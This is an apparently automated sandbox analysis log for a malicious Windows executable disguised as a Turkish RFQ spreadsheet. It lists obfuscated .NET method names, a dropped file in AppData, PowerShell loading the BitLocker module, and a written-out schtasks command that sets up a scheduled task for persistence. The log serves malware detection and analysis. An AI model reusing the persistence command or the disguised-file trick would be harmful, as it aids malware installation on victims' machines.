Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, qB75hHcSQCiCj2fkFb.cs	High entropy of concatenated method names: 'M6tbxmyiji', 'IHgbjp1Tdb', 'n9hbVIHahY', 'hJmbY1RrGj', 'X9gb2kbHHd', 'c0ObgJr4Qu', 'xrcbew5XAR', 'CkdbcwOcIM', 'ujnbXXNWV1', 'fyTbFCiMLT'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, Kvab9VuZGqr2NOVR0X.cs	High entropy of concatenated method names: 'iBienoTK5y', 'GqIeIsZO62', 'a5Veq3OKAu', 'L7de0eJnQ6', 'CmqeC8QPkx', 'NFUe9N1JGJ', 'AemeyyeTgM', 'aYfeppTNCH', 'dEAeAvgVck', 'TNSeShS5ka'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, Axc2pjPbsjT8lF9hiXf.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wcgOTWJHuZ', 'Y2uODl1hOg', 'NigOoQJO5O', 'mKhOfV95T9', 'QvCOL3NVq4', 'iorOK3hMGM', 'OhROZRFhKg'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, YfX6kRtYhki4MROEnL.cs	High entropy of concatenated method names: 'OG7HpDyZjp', 'I0aHAiQN76', 'btaH6Sw9Ou', 'BnZHvVuwiK', 'wc5H5c9USt', 's3mHlbAY29', 'HfIHhA3Wbd', 'My6Hip5DJS', 'eI8HstAhJY', 'KjcHRfPV26'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, UUaRtiEH1qkZgLcCSK.cs	High entropy of concatenated method names: 'Cu3qXsUDk', 'oao0OflXi', 'Dpu9tThYj', 'QgHyOUp2t', 'TTmA3yRAp', 'k8DS9s75F', 'OsutjrG0SCDCebhKR8', 'WuGyG3lgRuT4CH0WGC', 'eiXryATJl', 'NLJOwirw0'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, gjjnn1YciVTBXEdTFd.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'PiXEUJxTcr', 'fOyE7UUk9D', 'FdyEz0K2fW', 'LBSbW61ets', 'nXibPwftMx', 'JsnbEnlbIb', 'UoSbbyg9U6', 'UwDBI4z406SE5NTrCD'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, WJo1XlAY3wnLKDarrZ.cs	High entropy of concatenated method names: 'n1lY0WThYF', 'e0EY9plCtK', 'v8dYpbGk8U', 'rYjYAvdt1X', 'yojY32wroA', 'clhYJ3AKUH', 'X48Y1qjWDF', 'kMlYryLNe5', 'DrbYaOi4lv', 'mFbYOZuamL'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, BbAyteVmtin9f82xbc.cs	High entropy of concatenated method names: 'Dispose', 'COgPUGrVr5', 'D34EvEXo5l', 'wiIxxvjNoV', 'i6XP74B5TH', 'Bv6Pzr0CFU', 'ProcessDialogKey', 'g1TEWjfeHf', 'WfvEPLBqV3', 'AEEEEElaYa'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, op8S9K6ZSubxGmm5E0.cs	High entropy of concatenated method names: 'YGHgxZJ7Np', 'VuLgV8gerC', 'wDpg2GBddb', 'K7MgeMaEqe', 'WYGgcGMioE', 'KJW2LTmioT', 'bqt2KYSD0r', 'OI72ZEnTPA', 'O3r2kZ3yHF', 'OrB2UXDlpg'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, QjfeHfUZfvLBqV30EE.cs	High entropy of concatenated method names: 'BYIr6Schdr', 'q0qrvggVki', 'ccjrGpfXWJ', 'Fb7r50YodU', 'dxKrTmruZX', 'QbJrlfeb59', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, zli3MhTQgWh6egod3Z.cs	High entropy of concatenated method names: 'D1O3sr1nul', 'zm43Q8CPVG', 'bdj3TBljWU', 'u9O3DVjHxv', 'Svu3vVPCts', 'gZS3GAt1EE', 'oS9355C0SW', 'zsi3lBgTkU', 'cg03dQO3Sk', 'qc33hIGQCb'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, OkwC80SxyQmnamS68k.cs	High entropy of concatenated method names: 'CCW2Csyhd5', 'G9s2ysZV5l', 'pK3YG5wiCI', 'at1Y50gOi1', 'w4UYlBPUSr', 'cfQYdrntvx', 'xSAYhr9uin', 'vQiYiuyIYd', 'h44Yuka9UL', 'rNiYs6S3TB'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, tFQgfTPWLBakuuJYD38.cs	High entropy of concatenated method names: 'nh3anLWYyx', 'JteaIUamkP', 'j8WaqgZKsE', 'ylua02jISC', 'fE3aCtcO0x', 'NJia9YAt1v', 'zpWayW5QRg', 'NSnapOvcQf', 'HQDaAdpgfh', 'seEaSF2jwW'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, cunKBCp553M1W4qgFC.cs	High entropy of concatenated method names: 'QtGVTgBUc4', 'noOVDR23i7', 'IPTVoW1hXs', 'rDVVflXfrm', 'g9iVLULFqp', 'uHcVKchTMZ', 'VcuVZY5fWs', 'N9vVkbKKhl', 'QvdVULNElp', 'vwMV7eFTP7'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, X3eb5BKtGDC2CdsO3V.cs	High entropy of concatenated method names: 'u4e1kI9k93', 'XOt17E586u', 'xDtrW8EVpt', 'JiirPfRbo0', 'AXf1Rm2H8o', 'M8P1Q8RnZU', 'uNa1tfXqgF', 'TNm1TCfP2J', 'qt61DZ6XFW', 'Rdm1o0FQ6p'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, aofADfPPkpW5SDRnC4G.cs	High entropy of concatenated method names: 'ToString', 'RvjObJwob5', 'WAWOMo6UYC', 'zSpOxA9XhZ', 'MVsOjISpw3', 'Q4qOVueWH8', 'HQ7OYgyaRc', 'cEXO24ESUJ', 'MCSsnX7XjwD6eoL5TtV', 'zGE69p7YxRRAyfVOC0E'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, yTXnnEhR5An0b1BMbv.cs	High entropy of concatenated method names: 'GWQej58Pef', 'Y2ZeYixsLf', 'lTnegXrYnw', 'VrKg7vxbsS', 'ds7gzqEjEU', 'hOIeWaJyPo', 'n68ePZktoN', 'Hb4eEyngZm', 'YZBebmD3qq', 'KmaeM007OE'

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	File created: \tekl#u0130f talep ve f#u0130yat tekl#u0130f#u0130 rfq_xlsx.exe
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	File created: \tekl#u0130f talep ve f#u0130yat tekl#u0130f#u0130 rfq_xlsx.exe
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	File created: \tekl#u0130f talep ve f#u0130yat tekl#u0130f#u0130 rfq_xlsx.exe
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	File created: \tekl#u0130f talep ve f#u0130yat tekl#u0130f#u0130 rfq_xlsx.exe
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	File created: \tekl#u0130f talep ve f#u0130yat tekl#u0130f#u0130 rfq_xlsx.exe
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	File created: \tekl#u0130f talep ve f#u0130yat tekl#u0130f#u0130 rfq_xlsx.exe	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	File created: \tekl#u0130f talep ve f#u0130yat tekl#u0130f#u0130 rfq_xlsx.exe	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	File created: \tekl#u0130f talep ve f#u0130yat tekl#u0130f#u0130 rfq_xlsx.exe	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	File created: \tekl#u0130f talep ve f#u0130yat tekl#u0130f#u0130 rfq_xlsx.exe	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	File created: \tekl#u0130f talep ve f#u0130yat tekl#u0130f#u0130 rfq_xlsx.exe	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

File created: C:\Users\user\AppData\Roaming\qovDEn.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp7EFB.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
